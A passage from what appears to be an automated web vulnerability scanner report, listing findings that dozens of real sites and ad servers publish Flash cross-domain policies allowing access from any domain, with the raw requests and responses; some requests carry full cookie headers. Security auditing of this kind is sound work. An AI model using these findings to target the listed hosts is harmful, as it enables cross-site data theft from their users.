Expires: Thu, 17 Nov 2011 19:15:59 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.12. http://college.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://college.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: college.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://college.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.13. http://collegebasketball.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://collegebasketball.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: collegebasketball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://collegebasketball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.14. http://collegefootball.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://collegefootball.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: collegefootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://collegefootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.15. http://colstc.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://colstc.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: colstc.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca04
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:42:42 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.16. http://colstj.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://colstj.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: colstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca03
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:42:45 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.17. http://ec.redcated/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ec.redcated
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.redcated

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 183121
Date: Sun, 30 Jan 2011 02:08:12 GMT
Expires: Thu, 03 Feb 2011 23:16:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.18. http://edge1.catalog.video.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge1.catalog.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: edge1.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 56616
Date: Sun, 30 Jan 2011 12:57:25 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Sat, 12 Feb 2011 21:13:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://edge2.catalog.video.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge2.catalog.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: edge2.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 200630
Date: Sun, 30 Jan 2011 12:57:41 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Fri, 11 Feb 2011 05:13:50 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://edge3.catalog.video.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge3.catalog.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: edge3.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 394973
Date: Sun, 30 Jan 2011 12:56:49 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Tue, 08 Feb 2011 23:13:56 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.21. http://edge4.catalog.video.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge4.catalog.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: edge4.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 85390
Date: Sun, 30 Jan 2011 12:56:51 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Sat, 12 Feb 2011 13:13:41 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://edge5.catalog.video.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://edge5.catalog.video.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: edge5.catalog.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-redacted/flash/gallerywidget/1_0/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8cf9e94b1113cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 218591
Date: Sun, 30 Jan 2011 12:56:59 GMT
Last-Modified: Wed, 23 Jun 2010 20:18:51 GMT
Expires: Fri, 11 Feb 2011 00:13:48 GMT
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

6.23. http://i4.ytimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i4.ytimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: i4.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Sun, 30 Jan 2011 11:11:18 GMT
Expires: Sun, 06 Feb 2011 11:11:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 5862
Content-Length: 102

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.24. http://jcfootball.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jcfootball.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: jcfootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://jcfootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.25. http://mlb.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mlb.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mlb.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://mlb.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.26. http://p.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://p.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:17:39 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://preps.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://preps.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: preps.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://preps.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.28. http://profootball.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://profootball.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: profootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://profootball.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.29. http://r1.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:12 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.30. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 15:17:01 GMT
Expires: Thu, 27 Jan 2011 15:16:53 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 39693
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.31. http://sas.ooyala.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sas.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: sas.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:49:00 GMT
Status: 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 344
Expires: Sun, 30 Jan 2011 13:49:00 GMT
Cache-Control: public, must-revalidate, max-age=3600

<?xml version='1.0'?>
<!DOCTYPE cross-domain-policy SYSTEM 'http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd'>
<cross-domain-policy>
<site-control permitted-cross-domain-polic
...[SNIP]...
<allow-access-from domain='*' />
...[SNIP]...

6.32. https://secure.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: https://secure.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:ab5"
Server: Microsoft-IIS/6.0
Server: Secure1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.33. http://stj.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stj.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: co1mppstca02
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:34:37 GMT
Content-Length: 224
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="http://autoshow.autos.msn.com" />
<allow-access-from domain="http://stb.redacted" />
<allow-access-from domain="*"/>
...[SNIP]...

6.34. http://whitepg-images.adbureau.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://whitepg-images.adbureau.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: whitepg-images.adbureau.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 23 May 2008 20:34:17 GMT
ETag: "30dd55-60-44debc0f86440"
Accept-Ranges: bytes
Content-Length: 96
Content-Type: text/xml
Cache-Control: max-age=86158
Expires: Mon, 31 Jan 2011 01:47:57 GMT
Date: Sun, 30 Jan 2011 01:51:59 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.35. http://wrapper.g.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wrapper.g.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wrapper.g.redacted

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 29 Sep 2009 20:50:08 GMT
Accept-Ranges: bytes
ETag: "81a1fd6d4641ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 346

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.36. http://www.morningstar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.morningstar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.morningstar.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 16:15:25 GMT
Accept-Ranges: bytes
ETag: "e88bdab52ec4c91:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:54:04 GMT
Connection: close
Set-Cookie: fp=015129635244320254; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.37. http://www.scout.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scout.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 222
Content-Type: text/xml
Content-Location: http://www.scout.com/crossdomain.xml
Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT
Accept-Ranges: bytes
ETag: "01f3482dc3fcb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

6.38. http://www.terra.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.terra.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.175600; path=/; expires=Fri, 01-Jan-2016 00:02:31 GMT; domain=.terra.com
Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT
ETag: "17bb6-91-44373f5718440"
Accept-Ranges: bytes
Content-Length: 145
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.39. http://www.webmd.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webmd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Content-Location: http://www.webmd.com/crossdomain.xml
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:7ec"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.40. http://ad.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:18 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "61f4da-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
